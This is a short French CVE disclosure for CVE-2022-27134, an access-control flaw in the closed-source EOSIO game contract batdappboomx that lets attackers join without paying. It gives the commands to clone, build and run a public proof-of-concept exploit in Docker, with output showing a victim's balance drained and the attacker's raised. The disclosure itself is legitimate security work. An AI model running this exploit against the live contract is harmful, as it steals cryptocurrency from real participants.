
CVE-2022-27134
CVE-2022-27134
batdappboomx est un contrat intelligent public fonctionnant sur la blockchain EOSIO. Ce contrat intelligent récompense ses participants en cryptomonnaie s'ils paient d'abord une certaine quantité de cryptomonnaie.
La dernière version de ce contrat intelligent. Le code de hachage sha256 du contrat intelligent est 1327c04cf4b56183eddb1a897bbebf5a873d3421272b708829a4ed0765bef820 Vérifiez-le sur l'explorateur de blockchain https://bloks.io/account/batdappboomx.
vulnérabilité de contrôle d'accès
batdappboomx n'est pas open-source, mais nous avons trouvé une vulnérabilité avec WASAI. Les attaquants peuvent rejoindre ce jeu sans rien payer.
git clone https://github.com/Kenun99/CVE-batdappboomx.git && cd CVE-batdappboomx
docker build -t localhost/client-eos:eos .
docker run --rm --network host -it localhost/client-eos:eos
EOSinfo 2022-03-11T14:28:53.345 keosd wallet_plugin.cpp:38 plugin_initialize ]
...
warn 2022-03-11T14:28:53.355 keosd wallet.cpp:218 save_wallet_file ] saving wallet to file /root/eosio-wallet/./default.wallet
Creating wallet: default
Save password to use in the future to unlock this wallet.
Without password imported keys will not be retrievable.
saving password to /root/passwd
imported private key for: EOS6MRyAjQq8ud7hVNYcfnVPJqcVpscN5So8BhtHuGYqET5GDW5CV
[+] victim's balance: 100.00 -> 0.00
[+] attacker's balance: 10000000.00 10000100.00
[+] Attaqué avec succès. Obtenu plus de cryptomonnaie.